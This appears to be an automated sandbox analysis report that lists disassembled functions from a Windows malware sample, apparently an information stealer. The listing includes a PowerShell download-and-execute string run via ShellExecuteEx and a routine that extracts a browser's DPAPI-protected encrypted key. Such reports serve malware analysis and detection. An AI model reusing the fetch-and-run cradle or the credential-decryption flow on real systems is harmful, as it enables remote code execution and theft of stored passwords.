Part of subcall function 022B6E37: strlen.MSVCRT ref: 022B6E6C

VirtualQueryEx.KERNEL32(022B7574,00000000,?,0000001C), ref: 022B71F9
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7401), ref: 022B731A

Part of subcall function 022B7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022B705F

Strings

@, xrefs: 022B720D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: b8bce5a0076e7737e7556d1c8808a667790fa2f9ac144cd8e32f4e963c14c982
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 345105B2E1410AEBDB04CFD8D991AEFB7B6BF88340F048519F915A7244D774EA01CBA1

Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D

Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3

Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8

Strings

@, xrefs: 00416FA6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5

Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19

Strings

*n@, xrefs: 004069BD, 004069C9, 004069DC, 004069E5, 00406A09, 00406A32, 00406A35, 00406AEF, 00406B01, 00406B0D, 00406B16, 00406B93, 00406B49, 00406A4A, 00406A6D, 00406A79, 00406AA1, 00406AD1, 00406AE3, 00406AAD, 00406ABA, 00406A56
*n@, xrefs: 00406B28, 00406BB6, 00406BBB, 00406B65

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: *n@$*n@
API String ID: 1029625771-193229609
Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95

Function 022B49E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0064A30C), ref: 022B4A42

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

lstrcat.KERNEL32(?,00000000), ref: 022B4A68
lstrcat.KERNEL32(?,?), ref: 022B4A87
lstrcat.KERNEL32(?,?), ref: 022B4A9B
lstrcat.KERNEL32(?,0064A284), ref: 022B4AAE
lstrcat.KERNEL32(?,?), ref: 022B4AC2
lstrcat.KERNEL32(?,0064A2C8), ref: 022B4AD6

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022B8FF7: GetFileAttributesA.KERNEL32(00000000,?,022A1DBB,?,?,0042565C,?,?,00420E1F), ref: 022B9006

Part of subcall function 022B47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022B47E7
Part of subcall function 022B47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022B47EE
Part of subcall function 022B47D7: wsprintfA.USER32 ref: 022B480D
Part of subcall function 022B47D7: FindFirstFileA.KERNEL32(?,?), ref: 022B4824

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
Instruction ID: b5b60a26aea26f1790cfd1f5c44623b0bfdc755557d5d727c82dc89069f59645
Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
Instruction Fuzzy Hash: B4315FB6950308ABDB15FBF0CC88EED737EAF58700F404589A24996084EEB49789CF95

Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00412D85

Strings

')", xrefs: 00412CB3
<, xrefs: 00412D39
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
Opcode Fuzzy Hash: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9

Function 022A1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022A14A5
__aulldiv.LIBCMT ref: 022A14BF
__aulldiv.LIBCMT ref: 022A14CD
ExitProcess.KERNEL32 ref: 022A14FB

Strings

@, xrefs: 022A149A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: 65c4a44156882598493e1b754a5fa9225a7aaf4ac068e4a84d5411182587b8d6
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 7E014BB0960308BBEB10DBD0CC99B9DBB79AF00716F208448E709776C8D7B495418B55

Function 022AA077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022B0CC7: memset.MSVCRT ref: 022B0E83
Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

memcmp.MSVCRT(?,00421114,00000003), ref: 022AA116
memset.MSVCRT ref: 022AA14F
LocalAlloc.KERNEL32(00000040,?), ref: 022AA1A8

Strings

@, xrefs: 022AA158

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @
API String ID: 1977917189-2766056989
Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
Instruction ID: aff0346c788ccc6db1eac906012f3a276c3554e5797786a98a83b3f48f3b4cf7
Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
Instruction Fuzzy Hash: D7613C31A20348DBCB24EFE8CD96FED7776AF45304F408118E90A9B598DBB46A05CF51

Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410DB8
strtok_s.MSVCRT ref: 00410EFD

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
Opcode Fuzzy Hash: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95

Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3

Strings

DPAPI, xrefs: 00409D89
, xrefs: 00409DC1
"encrypted_key":", xrefs: 00409D30

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
Opcode Fuzzy Hash: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5

Function 022BCDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 022BCDD8
GetCPInfo.KERNEL32(?,?), ref: 022BCDEB
memset.MSVCRT ref: 022BCE03
setSBUpLow.LIBCMT ref: 022BCED9

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
Instruction ID: d9385fcfbd834e7522e55f8c95ec8b441be857c093740eb2b52ca725064842b1
Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
Instruction Fuzzy Hash: 26312834A242929EE7278FB4CC943F9BFA09F46394F0881ABD991CF19AC768C405C761

Function 022B8067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B809E
RtlAllocateHeap.NTDLL(00000000), ref: 022B80A5
RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022B80C5
RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022B80E6
RegCloseKey.ADVAPI32(?), ref: 022B80F9

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction ID: ccc9fa7858402478ef48d29f37943126be62aa16a68bba4cf43a64b2967a67a1
Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction Fuzzy Hash: DB116DB5A94209BBD700CFD4DC4AFBBB7BDEB05740F004219F615A7280C7B458008BA2

Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
HeapAlloc.KERNEL32(00000000), ref: 00417E3E
RegOpenKeyExA.ADVAPI32(80000002,00749EF0,00000000,00020119,?), ref: 00417E5E
RegQueryValueExA.ADVAPI32(?,00781D78,00000000,00000000,000000FF,000000FF), ref: 00417E7F
RegCloseKey.ADVAPI32(?), ref: 00417E92

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6

Function 022B7987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B799B
RtlAllocateHeap.NTDLL(00000000), ref: 022B79A2
RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022B7920), ref: 022B79C2
RegQueryValueExA.ADVAPI32(022B7920,00420AAC,00000000,00000000,?,000000FF), ref: 022B79E1
RegCloseKey.ADVAPI32(022B7920), ref: 022B79EB

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction ID: d5f877d542e179e845249d659cfe8d6c97d1d7753423be142238c87855a67598
Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction Fuzzy Hash: 8201F4B9A40308FFEB10DFE4DD49FAEB7B9EB48701F104559FA05A7284D67555008F51

Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(007816A8,?,?,?,0041140C,?,007816A8,00000000), ref: 0041926C
lstrcpyn.KERNEL32(0064AB88,007816A8,007816A8,?,0041140C,?,007816A8), ref: 00419290
lstrlenA.KERNEL32(?,?,0041140C,?,007816A8), ref: 004192A7
wsprintfA.USER32 ref: 004192C7

Strings

%s%s, xrefs: 004192B5

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95

Function 022A1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 022A151B
RtlAllocateHeap.NTDLL(00000000), ref: 022A1522
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022A153E
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022A155C
RegCloseKey.ADVAPI32(?), ref: 022A1566

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction ID: 14a1b3ed69e6e6fce8a2a6de4c2007081361e53772ebd35b64932d8ea5b4738e
Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction Fuzzy Hash: B80131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51

Function 022BC9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 022BC9B5

Part of subcall function 022BC206: __getptd_noexit.LIBCMT ref: 022BC209
Part of subcall function 022BC206: __amsg_exit.LIBCMT ref: 022BC216

__getptd.LIBCMT ref: 022BC9CC
__amsg_exit.LIBCMT ref: 022BC9DA
__lock.LIBCMT ref: 022BC9EA
__updatetlocinfoEx_nolock.LIBCMT ref: 022BC9FE

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

